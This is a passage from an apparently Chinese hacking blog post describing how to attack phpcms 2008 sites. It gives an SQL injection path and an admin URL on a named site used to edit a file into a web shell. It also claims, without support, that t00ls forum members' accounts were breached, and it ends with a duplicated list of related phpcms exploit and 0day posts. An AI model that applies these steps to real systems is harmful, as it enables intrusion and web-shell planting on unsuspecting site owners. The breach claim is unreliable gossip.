注入yp/company.php?where=%23
进入后台访问
http://www.heimian.com/admin.php?mod=phpcms&file=safe&action=see_code&files=kindle.php
编辑shell,另外phpcms2008有多出包含漏洞,尚未得到合适利用暂时先不发布了
Ps:t00ls那个陆jj装比最没水准,把后台拿shell的漏洞说成uc通杀的0day,BS下
对了,t00ls的会员以上的id密码没改好的赶快了,你们前阵子被日了,估计都不知道吧
只显示10条记录相关文章
phpcms V9 BLind SQL Injection Vulnerability (浏览: 15092, 评论: 0)
Phpcms 2008 flash_upload.php文件注入漏洞 (浏览: 16024, 评论: 0)
Phpcms 2008 query.php SQL注入漏洞 (浏览: 9255, 评论: 0)
Phpcms 2008 space.api.php SQL注入漏洞 (浏览: 7968, 评论: 0)
很老的一个PHPCMS2008 SP2 0day (浏览: 10069, 评论: 0)
Phpcms2008本地文件包含漏洞及利用:任意SQL语句执行 (浏览: 10945, 评论: 0)
phpcms 0day一枚 (浏览: 13997, 评论: 0)
phpcms2008 sp3通杀0day (浏览: 8566, 评论: 0)
phpcms2008sp4 最新sql注入 (浏览: 9818, 评论: 0)
phpcms2008sp4 IIS下下载任意文件漏洞 (浏览: 11142, 评论: 0)
Phpcms 2008 flash_upload.php文件注入漏洞 (浏览: 16024, 评论: 0)
Phpcms 2008 query.php SQL注入漏洞 (浏览: 9255, 评论: 0)
Phpcms 2008 space.api.php SQL注入漏洞 (浏览: 7968, 评论: 0)
很老的一个PHPCMS2008 SP2 0day (浏览: 10069, 评论: 0)
Phpcms2008本地文件包含漏洞及利用:任意SQL语句执行 (浏览: 10945, 评论: 0)
phpcms 0day一枚 (浏览: 13997, 评论: 0)
phpcms2008 sp3通杀0day (浏览: 8566, 评论: 0)
phpcms2008sp4 最新sql注入 (浏览: 9818, 评论: 0)
phpcms2008sp4 IIS下下载任意文件漏洞 (浏览: 11142, 评论: 0)
Trackbacks
 |
 |
 |
